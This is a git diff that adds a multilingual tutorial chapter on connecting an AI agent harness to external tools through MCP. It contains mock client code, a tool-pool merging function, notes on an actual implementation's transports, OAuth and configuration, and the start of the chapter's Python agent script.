+Servers can also request permissions: `notifications/claude/channel/permission_request` → Agent replies `notifications/claude/channel/permission`. Users confirm/deny via a 5-letter short ID.
+
+### 5. OAuth Authentication Flow
+
+CC's MCP authentication (`auth.ts`, 2466 lines) supports a full OAuth 2.0 + PKCE flow:
+- OAuth metadata discovery via public client + PKCE (RFC 8414 / RFC 9728)
+- Local callback server receives authorization code
+- Tokens persisted via `getSecureStorage()` (macOS Keychain / Linux encrypted file / Windows Credential Manager)
+- Auto-refresh 5 minutes before expiry
+- Cross-application access (XAA): browser gets id_token → RFC 8693 + RFC 7523 exchange → no repeated browser popups
+
+### 6. Configuration Sources and Priority
+
+MCP server configuration comes from 6 sources, from lowest to highest priority (`config.ts:1071-1251`):
+
+```
+plugins → claude.ai connectors → user settings.json → project .mcp.json → local settings.local.json
+```
+
+Same-name servers are deduplicated by content signature. When enterprise `managed-mcp.json` exists, all other configurations are excluded.
+
+### 7. 
Connection Lifecycle Error Handling + +CC has fine-grained error classification and retry for MCP connections (`client.ts:1266-1402`): +- **Terminal errors** (ECONNRESET, ETIMEDOUT, EPIPE, etc.): 3 consecutive failures → close + reconnect +- **Tool call 401**: Token expired → throw `McpAuthError` → trigger re-authentication +- **Tool call timeout**: `Promise.race` timeout (configurable, default ~28 hours) +- **Stdio disconnect**: Kill process in SIGINT → SIGTERM → SIGKILL order + +### The Tutorial's Simplifications Are Intentional + +- 6 transport types → 1 (stdio): Manageable concept count +- Channel reverse notifications → omitted: Tutorial agent is always the initiator +- OAuth flow → omitted: Tutorial assumes servers need no auth +- 6-layer config priority → omitted: Tutorial passes server_command directly +- Complex error classification → omitted: Tutorial uses try/except as fallback + +
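The stdio-disconnect behavior in section 7 — escalating SIGINT → SIGTERM → SIGKILL — can be sketched in a few lines. POSIX-only, and the grace period between signals is an invented value, not CC's:

```python
import signal
import subprocess

def kill_escalating(proc: subprocess.Popen, grace: float = 0.5) -> None:
    """Send increasingly forceful signals, waiting `grace` seconds
    for the process to exit after each one."""
    for sig in (signal.SIGINT, signal.SIGTERM, signal.SIGKILL):
        if proc.poll() is not None:      # already exited
            return
        proc.send_signal(sig)
        try:
            proc.wait(timeout=grace)
            return
        except subprocess.TimeoutExpired:
            continue                     # escalate to the next signal

proc = subprocess.Popen(["sleep", "60"])
kill_escalating(proc)
print("server process exited:", proc.returncode)
```

A well-behaved server exits on SIGINT; SIGKILL is the last resort for one that ignores both polite signals.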
+ + diff --git a/s19_mcp_plugin/README.ja.md b/s19_mcp_plugin/README.ja.md new file mode 100644 index 000000000..e1f31d185 --- /dev/null +++ b/s19_mcp_plugin/README.ja.md @@ -0,0 +1,239 @@ +# s19: MCP Plugin — 能力が足りない?外部ツールをプラグイン + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s17 → s18 → `s19` + +> *"能力が足りない?MCP をプラグイン"* — マルチトランスポート、チャネルルーティング、ツールプール統合。 +> +> **Harness 層**: プラグイン — 外部能力を標準プロトコルで接続。 + +--- + +## 課題 + +s01 から s18 まで、Agent が使用する全てのツールは自分で書いたもの — bash、read、write、task、todo_write。各ツールの入力検証、実行ロジック、エラーハンドリングのコードを自分で実装する。 + +しかし今、Agent に統合したい外部サービスが 3 つある:社内の Jira API(issue 検索、ticket 作成)、独自のデプロイシステム(deploy トリガー、ログ閲覧)、チームの Notion ナレッジベース(ドキュメント検索、ページ作成)。各サービスのためにツールコードを書き直したくない。 + +標準プロトコルが必要 — 外部サービスがこのプロトコルを実装していれば、サービスが何の言語で書かれていても、Agent は直接そのツールを呼び出せる。 + +--- + +## ソリューション + +![MCP Architecture](images/mcp-architecture.ja.svg) + +MCP(Model Context Protocol)は、Agent が外部ツールを発見・呼び出しする方法を定義。核心概念: + +| 概念 | 目的 | +|------|------| +| MCPClient | Agent 側のクライアント — server に接続、ツールを発見、ツールを呼び出し | +| MCP Server | 外部サービス側 — `tools/list` + `tools/call` を実装 | +| assemble_tool_pool | 組み込みツールと MCP ツールを一つのプールに統合 | +| mcp\_\_server\_\_tool 命名 | 異なる server 間のツール名衝突を防止 | + +s18 の全機能を保持(worktree 隔離、自動認領、空き時ポーリング、プロトコルシステム)。1 つの追加:`connect_mcp` ツール — 外部サービスに接続、ツールを発見、ツールプールに統合。 + +--- + +## 仕組み + +### MCPClient:発見 + 呼び出し + +```python +class MCPClient: + def __init__(self, name: str): + self.name = name + self.tools: list[dict] = [] + self._handlers: dict[str, callable] = {} + + def register(self, tool_defs, handlers): + """Simulates tools/list discovery.""" + self.tools = tool_defs + self._handlers = handlers + + def call_tool(self, tool_name: str, args: dict) -> str: + """Simulates tools/call.""" + handler = self._handlers.get(tool_name) + if not handler: + return f"MCP error: unknown tool '{tool_name}'" + return handler(**args) +``` + +チュートリアル版は mock handler で stdio JSON-RPC をシミュレート。実際の版はサブプロセスを起動し、stdin/stdout で `tools/list` と `tools/call` 
リクエストを送信。 + +### connect_mcp:接続 + 発見 + +```python +def connect_mcp(name: str) -> str: + """Connect to an MCP server and discover its tools.""" + factory = MOCK_SERVERS.get(name) + mcp_client = factory() + mcp_clients[name] = mcp_client + tool_names = [t["name"] for t in mcp_client.tools] + return f"Connected to '{name}'. Discovered: {', '.join(tool_names)}" +``` + +接続後、server が提供するツールが即座に利用可能。 + +### assemble_tool_pool:統合 + +```python +def assemble_tool_pool() -> tuple[list[dict], dict]: + tools = list(BUILTIN_TOOLS) + handlers = dict(BUILTIN_HANDLERS) + for server_name, mcp_client in mcp_clients.items(): + for tool_def in mcp_client.tools: + prefixed = f"mcp__{server_name}__{tool_def['name']}" + tools.append({ + "name": prefixed, + "description": tool_def.get("description", ""), + "input_schema": tool_def.get("inputSchema", {}), + }) + handlers[prefixed] = ( + lambda **kw, c=mcp_client, t=tool_def["name"]: c.call_tool(t, kw)) + return tools, handlers +``` + +プレフィックス `mcp__{server}__{tool}` で異なる server 間のツール名衝突を防止。`connect_mcp` 呼び出し後、agent_loop が自動的に再 assemble し、新しいツールが即座に利用可能。 + +--- + +## s18 からの変更 + +| コンポーネント | 変更前 (s18) | 変更後 (s19) | +|--------------|------------|------------| +| ツールソース | 全て手書き builtin | 手書き + MCP 外部ツール動的発見 | +| ツールプール | 固定 BUILTIN_TOOLS | assemble_tool_pool が動的に mcp\_\_ プレフィックスツールを統合 | +| 新規タイプ | — | MCPClient クラス(tools/list + tools/call をシミュレート) | +| 名前空間 | — | mcp\_\_server\_\_tool 衝突防止 | +| Lead ツール | 16 (s18) | 17 (+connect_mcp) | +| 拡張方法 | ツール追加のコードを書く | 標準プロトコル、任意言語で server を実装 | + +--- + +## 試してみる + +```sh +cd learn-claude-code +python s19_mcp_plugin/code.py +``` + +以下のプロンプトを試してください: + +1. `Connect to the docs MCP server and search for something` +2. `Connect to the deploy server and trigger a deployment` +3. `Connect both servers — what tools are now available?` + +観察ポイント:MCP server 接続後、ツール名に `mcp__docs__` や `mcp__deploy__` プレフィックスが付いているか?両方の server のツールが同時に利用可能か? 
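上の `connect_mcp` はサーバー名を `MOCK_SERVERS`(ファクトリ関数のレジストリ)から引くが、その中身は本 README には載っていない。最小のスケッチ — `docs` サーバーとその `search` ツールは説明用の仮の名前:

```python
class MCPClient:
    """Same shape as the tutorial's MCPClient above."""
    def __init__(self, name: str):
        self.name = name
        self.tools: list[dict] = []
        self._handlers: dict = {}

    def register(self, tool_defs, handlers):
        self.tools = tool_defs
        self._handlers = handlers

    def call_tool(self, tool_name: str, args: dict) -> str:
        handler = self._handlers.get(tool_name)
        if not handler:
            return f"MCP error: unknown tool '{tool_name}'"
        return handler(**args)


def make_docs_server() -> MCPClient:
    """Factory: a client whose handlers fake a docs service."""
    client = MCPClient("docs")
    client.register(
        [{"name": "search",
          "description": "Search the docs knowledge base.",
          "inputSchema": {"type": "object",
                          "properties": {"query": {"type": "string"}},
                          "required": ["query"]}}],
        {"search": lambda query: f"3 hits for '{query}' (mock)"})
    return client


# サーバー名 → ファクトリ。2 回接続すれば独立したクライアントが 2 つできる。
MOCK_SERVERS = {"docs": make_docs_server}

client = MOCK_SERVERS["docs"]()                    # connect_mcp がやること
print(client.call_tool("search", {"query": "worktree"}))
print(f"mcp__docs__{client.tools[0]['name']}")     # プレフィックス付きの名前
```

`assemble_tool_pool` の後、モデルにはこのツールが組み込みツールと並んで `mcp__docs__search` として見える。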
+
+---
+
+## ここまで来た
+
+これが最終章。歩んできた道を振り返る:
+
+```
+s01-s04 ツールパイプライン loop → dispatch → permission → hooks
+s05-s08 単体 Agent 能力 planning → subagent → skill → compact
+s09-s11 知識と靭性 memory → prompt → error recovery
+s12-s14 永続的作業 task graph → background → cron
+s15-s19 マルチ Agent teams → protocols → autonomy → worktree → MCP
+```
+
+ゼロから完全な Agent の harness を構築した。19 の章、各章は 1 つの仕組みを追加。各仕組みは同じ while True ループに接続 — ループそのものは、変わっていない。
+
+CC ソースコード深掘り
+
+> 以下は CC ソースコード `services/mcp/client.ts`(3348 行)、`auth.ts`(2466 行)、`config.ts`(1579 行)、`channelNotification.ts`(317 行)の完全分析に基づく。
+
+### 一、6 種の Transport タイプ
+
+チュートリアル版は stdio のみ。CC は 6 種のトランスポートをサポート(`types.ts:23-25`):
+
+| Transport | 通信方式 |
+|-----------|---------|
+| `stdio` | サブプロセス stdin/stdout(クロスプラットフォームデフォルト) |
+| `sse` | HTTP Server-Sent Events |
+| `http` | Streamable HTTP(POST/SSE 双方向) |
+| `ws` | WebSocket |
+| `sse-ide` | IDE 内蔵 SSE トランスポート |
+| `sdk` | プロセス内 SDK トランスポート |
+
+接続時、ローカル(stdio)とリモート(http/sse/ws)サーバーをバッチで並行処理:ローカルは 3 つずつ、リモートは 20 個ずつ。
+
+### 二、ツールプール統合の正確なアルゴリズム
+
+`assembleToolPool()`(`tools.ts:345-367`):
+
+```typescript
+// 重複排除時に組み込みツールを優先(name が同じ場合、組み込みが先)
+return uniqBy(
+  [...builtInTools.sort(byName), ...filteredMcpTools.sort(byName)],
+  'name',
+)
+```
+
+**重要な詳細**:組み込みツールと MCP ツールは別々にソート、混ぜてソートしない。理由は CC の `claude_code_system_cache_policy` が最後の組み込みツールの後の特定位置にグローバルキャッシュブレークポイントを置く設計のため — ソートを混ぜるとこの設計が壊れる。
+
+### 三、命名規則:`mcp__server__tool`
+
+`buildMcpToolName()`(`mcpStringUtils.ts:50-52`):
+
+```
+mcp__<server>__<tool>
+```
+
+`[a-zA-Z0-9_-]` 以外の全文字を `_` に置換。例:`slack` サーバーの `post_message` → `mcp__slack__post_message`。
+
+### 四、Channel 通知:サーバーからの逆方向メッセージ
+
+チュートリアル版は Agent → MCP Server の一方向呼び出しのみ。CC は**逆方向通知**もサポート(`channelNotification.ts`):
+
+1. Server が `capabilities.experimental['claude/channel']` を宣言
+2. Server が MCP 通知 `notifications/claude/channel` で Agent にメッセージを送信
+3. メッセージは `...` XML タグでラップ
+4. 
Agent は SleepTool で起床(1 秒以内) + +Server は権限リクエストも可能:`notifications/claude/channel/permission_request` → Agent が `notifications/claude/channel/permission` で応答。ユーザーは 5 文字の短い ID で確認/拒否。 + +### 五、OAuth 認証フロー + +CC の MCP 認証(`auth.ts`、2466 行)は完全な OAuth 2.0 + PKCE フローをサポート: +- 公開クライアント + PKCE で OAuth メタデータを発見(RFC 8414 / RFC 9728) +- ローカルコールバックサーバーが認可コードを受信 +- トークンは `getSecureStorage()` で永続化(macOS Keychain / Linux 暗号化ファイル / Windows 資格情報マネージャー) +- 有効期限 5 分前に自動リフレッシュ +- クロスアプリケーションアクセス(XAA):ブラウザが id_token を取得 → RFC 8693 + RFC 7523 交換 → 繰り返しブラウザポップアップ不要 + +### 六、設定ソースと優先度 + +MCP サーバー設定は 6 つのソースから、低い順に(`config.ts:1071-1251`): + +``` +プラグイン > claude.ai コネクタ > ユーザー settings.json > プロジェクト .mcp.json > ローカル settings.local.json +``` + +同名サーバーはコンテンツ署名で重複排除。企業 `managed-mcp.json` が存在する場合、他の全設定を完全に除外。 + +### 七、接続ライフサイクルのエラーハンドリング + +CC は MCP 接続にきめ細かいエラー分類とリトライを行う(`client.ts:1266-1402`): +- **終局エラー**(ECONNRESET、ETIMEDOUT、EPIPE 等):連続 3 回 → クローズ + 再接続 +- **ツール呼び出し 401**:トークン期限切れ → `McpAuthError` スロー → 再認証トリガー +- **ツール呼び出しタイムアウト**:`Promise.race` タイムアウト(設定可能、デフォルト約 28 時間) +- **Stdio 切断**:SIGINT → SIGTERM → SIGKILL の順でプロセスを kill + +### チュートリアル版の簡略化は意図的 + +- 6 種のトランスポート → 1 種(stdio):概念量を管理可能に +- Channel 逆方向通知 → 省略:チュートリアル版 Agent は常にイニシエータ +- OAuth フロー → 省略:チュートリアル版は server が認証不要と仮定 +- 6 層の設定優先度 → 省略:チュートリアル版は直接 server_command を渡す +- 複雑なエラー分類 → 省略:チュートリアル版は try/except でフォールバック + +
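三節の命名規則は、最小限の Python で再現できる。以下は CC の `buildMcpToolName` の移植ではなく、本文の置換規則(`[a-zA-Z0-9_-]` 以外を `_` に置換)に基づく仮定的なスケッチ:

```python
import re

def build_mcp_tool_name(server: str, tool: str) -> str:
    # [a-zA-Z0-9_-] 以外の文字をすべて '_' に置換する(本文の規則に基づく仮定的な再実装)
    def clean(s: str) -> str:
        return re.sub(r"[^a-zA-Z0-9_-]", "_", s)
    return f"mcp__{clean(server)}__{clean(tool)}"

print(build_mcp_tool_name("slack", "post_message"))  # mcp__slack__post_message
print(build_mcp_tool_name("my.server", "do/thing"))  # mcp__my_server__do_thing
```

サニタイズ後の名前は `mcp__` 区切りを壊さないため、プレフィックスから server 名とツール名を安全に逆引きできる。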
+ + diff --git a/s19_mcp_plugin/README.md b/s19_mcp_plugin/README.md new file mode 100644 index 000000000..2a624dbc9 --- /dev/null +++ b/s19_mcp_plugin/README.md @@ -0,0 +1,239 @@ +# s19: MCP Plugin — 能力不够?插上外接工具 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s17 → s18 → `s19` + +> *"能力不够? 插上 MCP"* — 多传输、通道路由、工具池合并。 +> +> **Harness 层**: 插件 — 外部能力通过标准协议接入。 + +--- + +## 问题 + +从 s01 到 s18,Agent 用的所有工具都是你手写的——bash、read、write、task、todo_write。你自己写代码实现每个工具的输入验证、执行逻辑、错误处理。 + +但现在你有 3 个外部服务想接入 Agent:公司的 Jira API(查 issue、创建 ticket)、自建的部署系统(触发 deploy、查看日志)、团队的 Notion 知识库(搜索文档、创建页面)。你不想为每个服务重写一套工具代码。 + +你需要一套标准协议——只要外部服务实现了这个协议,Agent 就能直接调用它的工具,不管服务是用什么语言写的。 + +--- + +## 解决方案 + +![MCP Architecture](images/mcp-architecture.svg) + +MCP(Model Context Protocol)定义了 Agent 如何发现和调用外部工具。核心概念: + +| 概念 | 作用 | +|------|------| +| MCPClient | Agent 这边的客户端,连接 server、发现工具、调用工具 | +| MCP Server | 外部服务那边,实现 `tools/list` + `tools/call` | +| assemble_tool_pool | 把内置工具和 MCP 工具合并成一个池子 | +| mcp\_\_server\_\_tool 命名 | 避免不同 server 的工具名冲突 | + +s18 的全部能力保留(worktree 隔离、自主认领、空闲轮询、协议系统)。新增一样:`connect_mcp` 工具——连接外部服务,发现工具,合并到工具池。 + +--- + +## 工作原理 + +### MCPClient:发现 + 调用 + +```python +class MCPClient: + def __init__(self, name: str): + self.name = name + self.tools: list[dict] = [] + self._handlers: dict[str, callable] = {} + + def register(self, tool_defs, handlers): + """Simulates tools/list discovery.""" + self.tools = tool_defs + self._handlers = handlers + + def call_tool(self, tool_name: str, args: dict) -> str: + """Simulates tools/call.""" + handler = self._handlers.get(tool_name) + if not handler: + return f"MCP error: unknown tool '{tool_name}'" + return handler(**args) +``` + +教学版用 mock handler 模拟 stdio JSON-RPC。真实版会启动子进程,通过 stdin/stdout 发送 `tools/list` 和 `tools/call` 请求。 + +### connect_mcp:连接 + 发现 + +```python +def connect_mcp(name: str) -> str: + """Connect to an MCP server and discover its tools.""" + factory = MOCK_SERVERS.get(name) + mcp_client = factory() 
+    mcp_clients[name] = mcp_client
+    tool_names = [t["name"] for t in mcp_client.tools]
+    return f"Connected to '{name}'. Discovered: {', '.join(tool_names)}"
+```
+
+连接后,server 提供的工具立即可用。
+
+### assemble_tool_pool:合并
+
+```python
+def assemble_tool_pool() -> tuple[list[dict], dict]:
+    tools = list(BUILTIN_TOOLS)
+    handlers = dict(BUILTIN_HANDLERS)
+    for server_name, mcp_client in mcp_clients.items():
+        for tool_def in mcp_client.tools:
+            prefixed = f"mcp__{server_name}__{tool_def['name']}"
+            tools.append({
+                "name": prefixed,
+                "description": tool_def.get("description", ""),
+                "input_schema": tool_def.get("inputSchema", {}),
+            })
+            # 用默认参数绑定循环变量(** 参数必须放在最后)
+            handlers[prefixed] = (
+                lambda c=mcp_client, t=tool_def["name"], **kw: c.call_tool(t, kw))
+    return tools, handlers
+```
+
+前缀 `mcp__{server}__{tool}` 避免不同 server 的工具名冲突。调用 `connect_mcp` 后,agent_loop 自动重新 assemble,新工具立即可用。
+
+---
+
+## 相对 s18 的变更
+
+| 组件 | 之前 (s18) | 之后 (s19) |
+|------|-----------|-----------|
+| 工具来源 | 全部手写 builtin | 手写 + MCP 外部工具动态发现 |
+| 工具池 | 固定 BUILTIN_TOOLS | assemble_tool_pool 动态合并 mcp\_\_ 前缀工具 |
+| 新类型 | — | MCPClient 类(模拟 tools/list + tools/call) |
+| 命名空间 | — | mcp\_\_server\_\_tool 避免冲突 |
+| Lead 工具 | 16 (s18) | 17 (+connect_mcp) |
+| 扩展方式 | 写代码加工具 | 标准协议,任意语言实现 server |
+
+---
+
+## 试一下
+
+```sh
+cd learn-claude-code
+python s19_mcp_plugin/code.py
+```
+
+试试这些 prompt:
+
+1. `Connect to the docs MCP server and search for something`
+2. `Connect to the deploy server and trigger a deployment`
+3. `Connect both servers — what tools are now available?`
+
+观察重点:连接 MCP server 后,工具名是否带 `mcp__docs__` 或 `mcp__deploy__` 前缀?两个 server 的工具是否同时可用?
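想在不调 API 的情况下验证上面的观察重点,可以用下面这个假设性的最小草图:它简化复现了本章的 `MCPClient` / `assemble_tool_pool`,确认已连接 server 的工具会以 `mcp__{server}__{tool}` 名字进入工具池,并能通过前缀名正确路由:

```python
# 基于本章代码片段的简化草图(教学复现,不是实现本身)
class MCPClient:
    def __init__(self, name):
        self.name = name
        self.tools = []          # 相当于 tools/list 的结果
        self._handlers = {}      # 工具名 → mock handler

    def register(self, tool_defs, handlers):
        self.tools = tool_defs
        self._handlers = handlers

    def call_tool(self, tool_name, args):
        handler = self._handlers.get(tool_name)
        if not handler:
            return f"MCP error: unknown tool '{tool_name}'"
        return handler(**args)

BUILTIN_TOOLS = [{"name": "bash"}]
BUILTIN_HANDLERS = {"bash": lambda command: f"ran: {command}"}

# 复现只连接了一个 mock "docs" server 的状态
docs = MCPClient("docs")
docs.register([{"name": "search"}],
              {"search": lambda query: f"[docs] results for '{query}'"})
mcp_clients = {"docs": docs}

def assemble_tool_pool():
    tools = list(BUILTIN_TOOLS)
    handlers = dict(BUILTIN_HANDLERS)
    for server_name, c in mcp_clients.items():
        for tool_def in c.tools:
            prefixed = f"mcp__{server_name}__{tool_def['name']}"
            tools.append({"name": prefixed})
            # 用默认参数绑定循环变量(避免闭包晚绑定)
            handlers[prefixed] = (
                lambda c=c, t=tool_def["name"], **kw: c.call_tool(t, kw))
    return tools, handlers

tools, handlers = assemble_tool_pool()
print([t["name"] for t in tools])                    # ['bash', 'mcp__docs__search']
print(handlers["mcp__docs__search"](query="auth"))   # [docs] results for 'auth'
```

builtin 和 MCP 的 handler 进同一个 dict,agent_loop 在 dispatch 时不需要关心工具来自哪里。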
+ +--- + +## 你走到了这里 + +这是最后一章。回顾你走过的路: + +``` +s01-s04 工具管线 loop → dispatch → permission → hooks +s05-s08 单Agent能力 planning → subagent → skill → compact +s09-s11 知识与韧性 memory → prompt → error recovery +s12-s14 持久化工作 task graph → background → cron +s15-s19 多Agent平台 teams → protocols → autonomy → worktree → MCP +``` + +你已经从零构建了一个完整 Agent 的 harness。19 个章节,每个只加一个机制。每个机制都挂在同一个 while True 循环上——循环本身,从未改变。 + +
+## 深入 CC 源码
+
+> 以下基于 CC 源码 `services/mcp/client.ts`(3348 行)、`auth.ts`(2466 行)、`config.ts`(1579 行)、`channelNotification.ts`(317 行)的完整分析。
+
+### 一、6 种 Transport 类型
+
+教学版只展示了 stdio。CC 支持 6 种传输(`types.ts:23-25`):
+
+| Transport | 通信方式 |
+|-----------|---------|
+| `stdio` | 子进程 stdin/stdout(跨平台默认) |
+| `sse` | HTTP Server-Sent Events |
+| `http` | Streamable HTTP(POST/SSE 双向) |
+| `ws` | WebSocket |
+| `sse-ide` | IDE 内嵌 SSE 传输 |
+| `sdk` | 进程内 SDK 传输 |
+
+连接时本地(stdio)和远程(http/sse/ws)服务器分批并发:本地批量 3 个,远程批量 20 个。
+
+### 二、工具池合并的精确算法
+
+`assembleToolPool()`(`tools.ts:345-367`):
+
+```typescript
+// 去重时优先保留内置工具(name 相同时内置在前)
+return uniqBy(
+  [...builtInTools.sort(byName), ...filteredMcpTools.sort(byName)],
+  'name',
+)
+```
+
+**关键细节**:内置工具和 MCP 工具分开排序,不是合起来排。原因是 CC 的 `claude_code_system_cache_policy` 在最后一个内置工具之后的某个位置放全局缓存断点——混排会破坏这个设计。
+
+### 三、命名规则:`mcp__server__tool`
+
+`buildMcpToolName()`(`mcpStringUtils.ts:50-52`):
+
+```
+mcp__<server_name>__<tool_name>
+```
+
+所有非 `[a-zA-Z0-9_-]` 字符替换为 `_`。例如 `slack` 服务器的 `post_message` → `mcp__slack__post_message`。
+
+### 四、Channel 通知:服务器反向推消息
+
+教学版只讲了 Agent → MCP Server 的单向调用。CC 还支持**反向通知**(`channelNotification.ts`):
+
+1. Server 声明 `capabilities.experimental['claude/channel']`
+2. Server 通过 MCP 通知 `notifications/claude/channel` 给 Agent 发消息
+3. 消息包装在 `...` XML 标签中
+4. Agent 被 SleepTool 唤醒(1 秒内)
+
+Server 还可以请求权限:`notifications/claude/channel/permission_request` → Agent 回复 `notifications/claude/channel/permission`。用户通过 5 字母短 ID 确认/拒绝。
+
+### 五、OAuth 认证流程
+
+CC 的 MCP 认证(`auth.ts`,2466 行)支持完整的 OAuth 2.0 + PKCE 流程:
+- 通过公共客户端(public client)+ PKCE 发现 OAuth 元数据(RFC 8414 / RFC 9728)
+- 本地回调服务器接收授权码
+- 令牌通过 `getSecureStorage()` 持久化(macOS Keychain / Linux 加密文件 / Windows 凭据管理器)
+- 过期前 5 分钟自动刷新
+- 支持跨应用访问(XAA):浏览器获取 id_token → RFC 8693 + RFC 7523 交换 → 无需反复弹浏览器
+
+### 六、配置来源与优先级
+
+MCP 服务器配置来自 6 个来源,优先级从低到高(`config.ts:1071-1251`):
+
+```
+插件 < claude.ai 连接器 < 用户 settings.json < 项目 .mcp.json < 本地 settings.local.json
+```
+
+同名服务器按内容签名去重。企业 `managed-mcp.json` 存在时完全排除其他配置。
+
+### 七、连接生命周期的错误处理
+
+CC 对 MCP 连接有精细的错误分类和重试(`client.ts:1266-1402`):
+- **终局性错误**(ECONNRESET、ETIMEDOUT、EPIPE 等):连续 3 次 → 关闭 + 重连
+- **工具调用 401**:令牌过期 → 抛出 `McpAuthError` → 触发重认证
+- **工具调用超时**:`Promise.race` 超时(可配置,默认 ~28 小时)
+- **Stdio 断连**:按 SIGINT → SIGTERM → SIGKILL 顺序杀进程
+
+### 教学版的简化是刻意的
+
+- 6 种 transport → 1 种(stdio):概念量可控
+- Channel 反向通知 → 省略:教学版 Agent 是主动方
+- OAuth 流程 → 省略:教学版假设 server 不需要认证
+- 6 层配置优先级 → 省略:教学版直接传 server_command
+- 复杂的错误分类 → 省略:教学版用 try/except 兜底
+
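第三节的命名规则可以用几行 Python 复现。下面不是 CC `buildMcpToolName` 的移植,而是基于正文规则(非 `[a-zA-Z0-9_-]` 字符替换为 `_`)的假设性草图:

```python
import re

def build_mcp_tool_name(server: str, tool: str) -> str:
    # 把所有非 [a-zA-Z0-9_-] 的字符替换为 '_'(按正文规则的假设性重实现)
    def clean(s: str) -> str:
        return re.sub(r"[^a-zA-Z0-9_-]", "_", s)
    return f"mcp__{clean(server)}__{clean(tool)}"

print(build_mcp_tool_name("slack", "post_message"))  # mcp__slack__post_message
print(build_mcp_tool_name("my.server", "do/thing"))  # mcp__my_server__do_thing
```

清洗后的名字不会破坏 `mcp__` 分隔符,因此可以从前缀安全地反解出 server 名和工具名。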
+ + diff --git a/s19_mcp_plugin/code.py b/s19_mcp_plugin/code.py new file mode 100644 index 000000000..f046c8a50 --- /dev/null +++ b/s19_mcp_plugin/code.py @@ -0,0 +1,933 @@ +#!/usr/bin/env python3 +""" +s19: MCP Plugin — MCPClient + tool discovery + assemble_tool_pool. + +Run: python s19_mcp_plugin/code.py +Need: pip install anthropic python-dotenv + .env with ANTHROPIC_API_KEY + +Changes from s18: + - MCPClient class: discovers tools, calls tools via mock handler + - assemble_tool_pool: merges builtin + MCP tools into one pool + - connect_mcp: connect to an MCP server, discover tools + - Tool naming: mcp__{server}__{tool} to avoid conflicts + - agent_loop uses dynamic tool pool (builtin + MCP) + +ASCII flow: + connect_mcp("docs") → MCPClient discovers tools → + assemble_tool_pool → [builtin... , mcp__docs__search, mcp__docs__get_version] + agent_loop uses merged pool +""" + +import os, subprocess, json, time, random, threading +from pathlib import Path +from datetime import datetime +from dataclasses import dataclass, asdict, field + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# ── Task System (from s12 + s18 worktree field) ── + +TASKS_DIR = WORKDIR / ".tasks" +TASKS_DIR.mkdir(exist_ok=True) + + +@dataclass +class Task: + id: str + subject: str + description: str + status: str + owner: str | None + blockedBy: list[str] + worktree: str | None = None + + +def _task_path(task_id: str) -> Path: + return TASKS_DIR / f"{task_id}.json" + + +def create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> Task: + task = Task( + id=f"task_{int(time.time())}_{random.randint(0, 
9999):04d}", + subject=subject, description=description, + status="pending", owner=None, + blockedBy=blockedBy or [], + ) + save_task(task) + return task + + +def save_task(task: Task): + _task_path(task.id).write_text(json.dumps(asdict(task), indent=2)) + + +def load_task(task_id: str) -> Task: + return Task(**json.loads(_task_path(task_id).read_text())) + + +def list_tasks() -> list[Task]: + return [Task(**json.loads(p.read_text())) + for p in sorted(TASKS_DIR.glob("task_*.json"))] + + +def can_start(task_id: str) -> bool: + task = load_task(task_id) + return all(load_task(d).status == "completed" for d in task.blockedBy) + + +def claim_task(task_id: str, owner: str = "agent") -> str: + task = load_task(task_id) + if task.status != "pending": + return f"Task {task_id} is {task.status}, cannot claim" + if not can_start(task_id): + deps = [d for d in task.blockedBy if load_task(d).status != "completed"] + return f"Blocked by: {deps}" + task.owner = owner + task.status = "in_progress" + save_task(task) + print(f" \033[36m[claim] {task.subject} → in_progress\033[0m") + return f"Claimed {task.id} ({task.subject})" + + +def complete_task(task_id: str) -> str: + task = load_task(task_id) + if task.status != "in_progress": + return f"Task {task_id} is {task.status}, cannot complete" + task.status = "completed" + save_task(task) + unblocked = [t.subject for t in list_tasks() + if t.status == "pending" and t.blockedBy and can_start(t.id)] + print(f" \033[32m[complete] {task.subject} ✓\033[0m") + msg = f"Completed {task.id} ({task.subject})" + if unblocked: + msg += f"\nUnblocked: {', '.join(unblocked)}" + return msg + + +# ── Worktree System (from s18) ── + +WORKTREES_DIR = WORKDIR / ".worktrees" +WORKTREES_DIR.mkdir(exist_ok=True) + + +def run_git(args: list[str]) -> str: + try: + r = subprocess.run(["git"] + args, cwd=WORKDIR, + capture_output=True, text=True, timeout=30) + out = (r.stdout + r.stderr).strip() + return out[:5000] if out else "(no output)" + except 
subprocess.TimeoutExpired: + return "Error: git timeout" + + +def log_event(event_type: str, worktree_name: str, task_id: str = ""): + event = {"type": event_type, "worktree": worktree_name, + "task_id": task_id, "ts": time.time()} + events_file = WORKTREES_DIR / "events.jsonl" + with open(events_file, "a") as f: + f.write(json.dumps(event) + "\n") + + +def create_worktree(name: str, task_id: str = "") -> str: + path = WORKTREES_DIR / name + if path.exists(): + return f"Worktree '{name}' already exists at {path}" + result = run_git(["worktree", "add", str(path), "-b", f"wt/{name}", "HEAD"]) + if "error" in result.lower() or "fatal" in result.lower(): + return f"Git error: {result}" + if task_id: + bind_task_to_worktree(task_id, name) + log_event("create", name, task_id) + print(f" \033[33m[worktree] created: {name} at {path}\033[0m") + return f"Worktree '{name}' created at {path}" + + +def bind_task_to_worktree(task_id: str, worktree_name: str): + task = load_task(task_id) + task.worktree = worktree_name + if task.status == "pending": + task.status = "in_progress" + save_task(task) + + +def remove_worktree(name: str) -> str: + path = WORKTREES_DIR / name + if not path.exists(): + return f"Worktree '{name}' not found" + run_git(["worktree", "remove", str(path), "--force"]) + run_git(["branch", "-D", f"wt/{name}"]) + log_event("remove", name) + for task in list_tasks(): + if task.worktree == name and task.status == "in_progress": + task.status = "completed" + save_task(task) + print(f" \033[33m[worktree] removed: {name}\033[0m") + return f"Worktree '{name}' removed" + + +def keep_worktree(name: str) -> str: + log_event("keep", name) + print(f" \033[36m[worktree] kept: {name}\033[0m") + return f"Worktree '{name}' kept for review (branch: wt/{name})" + + +# ── Prompt Assembly (from s10) ── + +PROMPT_SECTIONS = { + "identity": "You are a coding agent. 
